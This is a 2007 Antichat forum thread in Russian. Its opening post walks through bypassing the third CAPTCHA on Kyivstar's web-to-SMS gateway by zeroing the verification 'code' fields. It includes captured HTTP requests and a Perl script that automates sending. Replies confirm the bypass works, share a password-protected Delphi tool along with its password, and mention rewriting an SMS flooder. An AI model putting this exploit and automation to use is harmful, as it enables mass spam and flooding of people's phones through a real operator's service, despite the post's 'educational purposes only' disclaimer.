Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
03.08.2007, 05:43
|
|
Banned
Регистрация: 12.01.2007
Сообщений: 113
Провел на форуме:
4094601
Репутация:
495
|
|
kyivstar CAPTHA III
обход CAPTCHA III
Краткая история CAPTCH''
~~~~~~~~~~~~~~~
- CAPTCHA I
Самая первая каптча была банально простой ,баг был в том, что кодеры немного промахнулись и влепили код подтверждение прямо в куки , об этом можно немного почитать здесь _ http://forum.antichat.ru/thread36930-dspam.html
- CAPTCHA II
Упустим этот раздел.
Пусть останется в секрете ее обход (давно уже переделали  )
- CAPTCHA III
//После обсуждений киевстара с " vvs777" (03.08.2007)
началось самое вкусное ,зайдя сегодня ночью на форум узнав что снова переделали на kyivstar.net каптчу решил на это взглянуть
Впечатление было ужасное .
После набранного номера и теста , нажав отправить я был в недоумении " Вкажіть 2 картинки живої природи",я подумал уже что
обхода уже не найти ,решил все-таки указать эти две картинки , врубил пакетолов .
И что я увидел:
Код:
POST /_sms/ HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-icq, */*
Referer: http://kyivstar.net/_sms/?lang=ua
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: kyivstar.net
Content-Length: 240
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: countSms=3; messageID=20070702223308.610CC7%40messenger
submitted=true&lang=ua&sms_adv=122&mobcode=067&number=XXXXXX&lat=1&message=111122&code=1186099766&code=96055154&code=8D7DAAC50375DF1E37009FF4C298C59A2272227A7E670DA3FEE8F337A1F6CE6EDEC2E139740C9289758EB5CC21002BE61B395669BE767085&code=0102
Ненашев нечего интересного (кроме каких-то 3-х сообщений в куках  )
,покопавшись, попробовал передавать везде 0
Код:
POST /_sms/ HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-icq, */*
Referer: http://kyivstar.net/_sms/?lang=ua
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: kyivstar.net
Content-Length: 240
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: countSms=3; messageID=20070702223308.610CC7%40messenger
submitted=true&lang=ua&sms_adv=122&mobcode=067&number=XXXXXXX&lat=1&message=111122&code=0&code=0&code=05&code=0
Тем хто непонял
я заменил ключи (которые генерируются фиг знает, каким способом )
Код:
code=1186099766
code=96055154
code=8D7DAAC50375DF1E37009FF4C298C59A2272227A7E670DA3FEE8F337A1F6CE6EDEC2E139740C9289758EB5CC21002BE61B395669BE767085
code=0102
Заменил на
Код:
code=0
code=0
code=0
code=0
После отправки модифицированного пакета на мой телефон пришло сообщение
Ниже приведу простой пример отправки сообщение на перле..
Код:
#!/usr/bin/perl
# 03.08.2007
# http://mobilnik.ua/news/12301.html :)
use LWP;
use LWP::UserAgent;
use strict;
my $browser = LWP::UserAgent->new;
$browser->agent('New captha v3.0');
#$browser->proxy(['http'] => 'http://61.47.2.249:8080');
print q(
--------------------------------------
| | - | + | x |
--------------------------------------
| specical for antichat.ru _______ |
| ------------------------- | ||
| icq:212-905-288 | ? ||
| ------------------------- |_______||
-------------------------------------- );
my $mob_code = "097";
my $mob_number = "XXXXXXX";
my $messenge = "hello antichat.ru";
my $curr_cookie = "countSms=0;
isUserLogined=false;
countSms=0;
messageID=20070702223308.610CC7%40messenger";
printf "\n\n\t[+]Send %s-%s \n\tmessage: \<<%s\>> ",
$mob_code,$mob_number,$messenge ;
my $url="http://kyivstar.net/_sms/?lang=ua";
my $response = $browser->post($url,
["submitted" => "true",
"lang" => "ua",
"sms_adv" => "101",
"mobcode" => $mob_code,
"number" => $mob_number,
"lat" => 1,
"message" => $messenge,
"code" => 0,
"code" => 0,
"code" => 0,
"code" => 0],
"Content-Type"=> "application/x-www-form-urlencoded",
"Cookie" => $curr_cookie);
Важно :
1-Материал исключительно в ознакомительных целях!
2-Автор этой статьи не несёт ответственность за возможные последствия использования материала в целях, запрещенных УК Укр. и нормами международного права.
Последний раз редактировалось demonoid; 03.08.2007 в 06:06..
|
|
|
03.08.2007, 06:22
|
|
Познавший АНТИЧАТ
Регистрация: 16.11.2004
Сообщений: 1,257
Провел на форуме:
1331503
Репутация:
454
|
|
Респект.
Держи + в репу.
Тема действительно работает. Киевстаровские кодеры или недоучки или с компании зарплату получают не за месяц а за кол-во работ =) что в принципе правильно. Полностью поменяв алгоритм картинки они забыли о главном =) - о проверке правильности инпута.
Вчера ввели новую проверку на ботовитость а сегодя той проверке пришел белый и пушистый.
Так что все у кого мобильник с Киевстаром - отключаемся на пару дней потому что то что будет когда то прочитают ... с4 в ужосе и медвед схавал свой превед.
Жаль не застал я времена http://www.kyivstar.net/cgi-bin/sms.pl с параметрами to_addr и new_body.
Тема имхо достойна раздела "Статьи".
Добавил: и вот еще моя реализация метода на Делфи - консольная софтинка =)
http://vvs777.ho.com.ua/sms/KS_SMS3.rar
на архиве пароль - он есть в каждой теме Форума.
(если б не сделал этот мини-квест не знаю что было бы  )
Последний раз редактировалось vvs777; 03.08.2007 в 07:30..
|
|
|
|
03.08.2007, 13:31
|
|
Участник форума
Регистрация: 11.05.2007
Сообщений: 149
Провел на форуме:
6373157
Репутация:
247
|
|
блин, придется опять переписывать флудера *((
|
|
|
|
03.08.2007, 15:40
|
|
Участник форума
Регистрация: 22.01.2007
Сообщений: 218
Провел на форуме:
1852162
Репутация:
156
|
|
Сьогодні з вашої Ip-адреси відправлено 44 коротких повідомлення.
|
|
|
|
03.08.2007, 15:50
|
|
Участник форума
Регистрация: 22.01.2007
Сообщений: 218
Провел на форуме:
1852162
Репутация:
156
|
|
Ваш ліміт на короткі повідомлення на сьогодні вичерпано.
Сьогодні з вашої Ip-адреси відправлено 4 коротких повідомлення.
они лолы
|
|
|
|
03.08.2007, 16:47
|
|
Участник форума
Регистрация: 11.05.2007
Сообщений: 149
Провел на форуме:
6373157
Репутация:
247
|
|
Точно что лолы. Придется переписывать Флудера. на днях будет готово
|
|
|
|
03.08.2007, 17:36
|
|
Познавший АНТИЧАТ
Регистрация: 16.11.2004
Сообщений: 1,257
Провел на форуме:
1331503
Репутация:
454
|
|
У меня спрашивают пасс на архив.
Это английские 2 слова, содержащиеся рядом на видном месте вначале каждой темы на Ачате.
|
|
|
|
03.08.2007, 18:04
|
|
Участник форума
Регистрация: 22.01.2007
Сообщений: 218
Провел на форуме:
1852162
Репутация:
156
|
|
http://forum.antichat.ru/showthread.php?p=428044#post428044
воть
|
|
|
|
03.08.2007, 19:13
|
|
Познавший АНТИЧАТ
Регистрация: 16.11.2004
Сообщений: 1,257
Провел на форуме:
1331503
Репутация:
454
|
|
Невірно вибрано картинки живої природи.
дырку закрыли???
pass на архив был "post reply"
Последний раз редактировалось vvs777; 03.08.2007 в 20:07..
|
|
|
|
03.08.2007, 19:57
|
|
Участник форума
Регистрация: 22.01.2007
Сообщений: 218
Провел на форуме:
1852162
Репутация:
156
|
|
это ты отправил больше 100 месаг за день
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
